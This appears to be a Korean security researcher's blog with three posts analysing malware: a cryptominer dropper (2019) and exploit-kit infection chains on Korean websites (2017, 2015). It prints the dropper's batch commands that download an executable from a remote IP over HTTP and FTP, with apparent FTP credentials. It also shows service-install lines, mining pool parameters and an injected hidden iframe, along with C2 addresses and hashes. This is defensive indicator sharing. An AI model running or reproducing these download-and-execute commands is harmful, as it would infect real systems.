posted by Kwan's 2019.09.23 17:34

안녕하세요?

올만에 글을 쓰게 됩니다.

 

이번에 글을 쓰는 이유는 올만에 파일을 발견하였기 때문입니다.

간락히 쓰고 그냥 MD5 공유 하려고 합니다.

 

1. dll.bat - 인터넷에서 감염 추정 (8월 16일) / 파일 발견 일자 (9월 17일)

2. .bat 파일 구조

 

3. .bat 파일 실행 구조 (핵심)

 

@echo off (웹 다운로드 부분)

taskkill /im 3.exe /f

md c:\windows\hashfish

del c:\windows\hashfish\3.exe

call :http "http://120.236.74.201:74/3.exe" c:\windows\hashfish\3.exe // SFX 압축 파일 (채굴 위한 악성코드)

ping 127.0.0.1 -n 2 >nul

if exist "c:\windows\hashfish\3.exe" (goto jc3)

 

-------------------------------------

 

@echo off (FTP를 통한 다운로드 로그인 불가)

(echo open 43.226.50.42

echo host908075088

echo ZHAOxin199

echo lcd "c:\windows\hashfish"

echo get 3.exe

echo bye)>ftp$

ftp -s:ftp$

del ftp$

 

--------------------------------------

 

:http

cscript -nologo -e:jscript "%~f0" "%~1" "%~2" //cssript 를 통한 파일 다운로드

 

[실행 시] // 다운로드 불가

cscript  -nologo -e:jscript "C:\Users\Administrator\Desktop\3.bat" "http://120.236.74.201:74/3.exe" "c:\windows\hashfish\3.exe"

 

4. 3.exe 실행 구조

 

3.exe는 SFX 압축 형태로 되어 있습니다.

따라서, 파일이 실행시 내부에 있는 명령어가 함께 동작을 하는 방식 입니다.

 

파일이 실행 될 경우 사용되는 명령어

Path=c:\windows\hashfish //파일 위치

SavePath

Setup=2.vbs // 실행 VBS

Silent=1 // 실행 모드

Overwrite=1 // 덮어 쓰기

Update=U // 업데이트

 

파일을 최초 실행 하면 c:\windows\hashfish에 저장되고 2.vbs를 실행 합니다.

CreateObject("WScript.Shell").Run "cmd /c c:\windows\hashfish\2.bat",0

 

다시 2.vbs는 2.bat를 실행 합니다.

c:\windows\hashfish\nssm6.exe install "ipconfig" "c:\windows\hashfish\snshost.exe"

c:\windows\hashfish\nssm3.exe install "ipconfig" "c:\windows\hashfish\snshost.exe"

net start ipconfig

del c:\windows\hashfish\dll.bat

 

2.bat를 통해 snshost.exe를 ipconfig 명으로 서비스 등록을 합니다.

 

코인 채굴이 시작되기 전 config.ini와 함께 api 서버에 접속 한 후 실행되게 됩니다.

이 과정에서 컴퓨터 정보를 전송 하는 역할도 합니다.

 

[default]

Language=zh

mid=

DisplayMid=

EncryptMid=ph_r1RwF1iERERyfx0=

used_num=15

worker=2019

[setting]

auto_run=1

CoinDisplayBalance=btc

auto_mining=01

hidetotray=01

[running]

start=1569225648

run=1569225647

[time]

quittime_h=0

quittime_l=1565837862

helperstarttime_h=0

helperstarttime_l=1569225647

ShowMachine=5

minetime_h=0

minetime_l=1565188165

 

 

5. 파일 정보 (MD5)

 

[메인 파일 정보]

dll.bat b380ba1f5f9e11d23909d541bd55893a

3.exe e467eaed2de807187cdfa41be3c9cee0

 

[부가적 파일 정보]

2.bat c786d194083d92f88d25eee528b6cb72

2.vbs fff342920954b3870bb7cbc09ccf70e6

config.ini a438050843f12d2056dfee56c6f03bf8

nssm3.exe bd3b9dac9198c57238d236435bf391ca

nssm6.exe 1136efb1a46d1f2d508162387f30dc4d

snshost.exe 38c2f3d459bc7d7160b927b785b782cc

7z.dll 3355159514ca435f662283af71ab0c84

hashfish_eth_ethminer_x64_cuda80_1.7.0.7z 02614562829ab6069c6f9df38382644c

hashfish_xmr_xmrig_x64_2.9.1.7z 5736772d694f7e9d584f263f6651f948

hashfish_xmr_xmrig_x64_cuda80_2.9.1.7z 11cf8f7e2adb2c022984c33e8462ee49

hashfish_xmr_xmrig_x86_2.9.1.7z 82c3f484c4407022ce89f57c53a26c2b

hfadl.dll 0d89896ebbd2a1b98523725bd056234e

HFHelper32.exe - f7c2ea83274c3e33558a4a386d2d637a

HFHelper64.exe - 1d3cb092fde6419ec594949dc880327b

 

[C2 정보]

120.236.74.201:74 (CN) // WEB

43.226.50.42 (CN) // FTP

 

[채굴 정보]

cn1.hfsvr.com:19893 -u ph_r1RwF1iERERyfx0= -p aGFzaGZpc2g6OjFkODRjNmM3YjBiZDMxZGRmZTQ0ZDhhZmI1YWYzY2I4

댓글을 달아 주세요

posted by Kwan's 2017.04.24 15:31


회사를 퇴사하고 나서 가끔씩 글을 쓸 예정 입니다.

정보가 많이 부족하긴 하지만 악성 스크립트 (국내 + 해외) / 파일분석 등을 적을 예정 입니다.

포스팅을 하는 이유는 그냥 심심해서 입니다.


1. 발견 사이트 (유포지)

cocoalba.kr/autojump/ad_xxxx/index.html


2. 최종 파일

leeve.co.kr/apps/up.exe (현재 404)

MD5 : 0952d38bf8b3f026cb3c41c87db338a7

C&C : r.pengyou.com/fcg-bin/cgi_get_portrait.fcg?uins=2889622357

[VT 결과]

virustotal.com/ko/file/1dd1dbd6631b8b0b87d7bbab7aff004c983dbe87ba6c9e7fed851de4786e6ae1/analysis/


3. 스크립트


초기 스크립트를 확인해보면 제가 마지막으로 본 이전 버전과는 다를게 많이 없습니다.

하지만, 해당 코드를 1차적으로 디코딩을 하면 새로운 값과 기존과 다른 스크립트가 있는 것을 확인할 수 있습니다.



- 1차 디코딩 스크립트


1차적으로 디코딩된 스크립트 같은 경우에는 난독화 부분과 디코딩을 위한 연산 부분을 나눌 수가 있으며, 최종 적으로는 t=utf8to16(nbencode(nbcode(t),JbWRn$q7)) 이부분을 통해 난독화가 해제 됩니다.



- 최종 스크립트


해제된 난독화를 살펴보면, _0x4b88로 정의되어 있는 것부터 시작을 한다.

_0x4b88 같은 경우에는 취약점으로 분기될 수 있도록 배열 형식에 맞춰 사용되도록 스크립트 구문을 공격자가 생성해놓았습니다.


[스크립트]




var _0x4b88 에정의된 내용



마지막으로 취약점으로 연결할 때에는 "var jaguarx=jaguar+" 이와 같이 정의가 되어 있는 것을 볼 수 있는데, 이것은 초기 스크립트내에서 정의 되어 있는 것을 확인하시면 됩니다.

참고로, jaguar = RhRdQk 입니다.

또한, exe 파일 같은 경우에도 초기에 복잡하게 되어 있는 것처럼 보이지만 기존과 별로 차이가 없습니다.


---------------------------

웹 페이지 메시지

---------------------------

http://leeve.co.kr/apps/up.exe

---------------------------

확인   

---------------------------


취약점같은 경우에는 세부적으로 보지는 않았지만, 거의 비슷한거 같아서 추후 포스팅을 하겠습니다.


몇년만에 쓰니까 잘 안써지지만, 꾸준히 포스팅을 하겠습니다.


마지막으로 심심할때마다 뭔가를 던져주는 창훈이에게 고맙다는 말을 전합니다!


감사합니다~


댓글을 달아 주세요

  1. 얼방 2017.04.24 15:43  Addr  Edit/Del  Reply

    다른 고마운 분은 없나요?

posted by Kwan's 2015.09.01 16:01

그냥 국내 웹사이트 중 리그킷 들어가 있는 곳을 발견해서 간단하게 흔적용으로 써봄.


1. 발견 사이트

http://www.irisxxxxxx.kr (꽃배달 사이트)

→ http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037

-→ http://new.ceptenporxxxxx.com/?xH6Af7iYJBvPCoo[하위생략] / (지속적인 링크 변경)

--→ http://new.ceptenporxxxxxx.com/index.php?xH6Af7iYJBvPCoo=[하위생략] / 최종 악성코드 다운로드


2. 삽입 형태

http://www.irisxxxxxx.kr

→ _script type="text/javascript" src="http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037"_


http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037

→ _document_write('_iframe src="http://new.ceptenporxxxxx.com/?xH6Af7iYJBvPCoo[하위생략] " style="left: -999px;top: -999px;position: absolute;" width="202" height="202"__/iframe_');


http://new.ceptenpoxxxxx.com/?xH6Af7iYJBvPCoo[하위생략]

→ /*(331387,4,14838)*/uo7("119p105p110p100");/* [생략]


3. 악성 스크립트 스샷

[그림 1. 난독화 된 RIG Exploit Kit 스크립트 ]


[그림 2. 디코딩 된 RIG Exploit Kit 스크립트]



[그림 3. 일부 디코딩 된 RIG Exploit Kit 스크립트 - CVE-2014-6332]




[그림 4. 디코딩 된 스크립트 중 일부 쉘코드에서 발견된 최종링크 연결]


4. 끄적끄적

분석을 방해하기 위한 주석등이 너무 많이 달림 일부 스크립트에서는 짤라서 쓰는걸 방지하기 위해 정의 선언이 되지 않은 코드도 넣음 지우고 처리하는데 조금 신경쓰임.. 국내에는 다양한 공격킷이 존재하지만 리그킷과 같은 경우 연구 대상(?) 다음번에는 앵글러를 한번 해 볼 생각...

아참 최종 유포지와 난독화 해제 부분만 언급했는데 어느 취약점을 이용하는지는 추후에 게시(?) 할 예정.

제목과 같이 그냥 끄적끄적..ㅎㅎ 이렇게 된다 정도?ㅎㅎ


[이전글]

2014/08/27 - [security/악성코드 유포] - RIG Exploit Kit 넌 누구냐?


TAG

댓글을 달아 주세요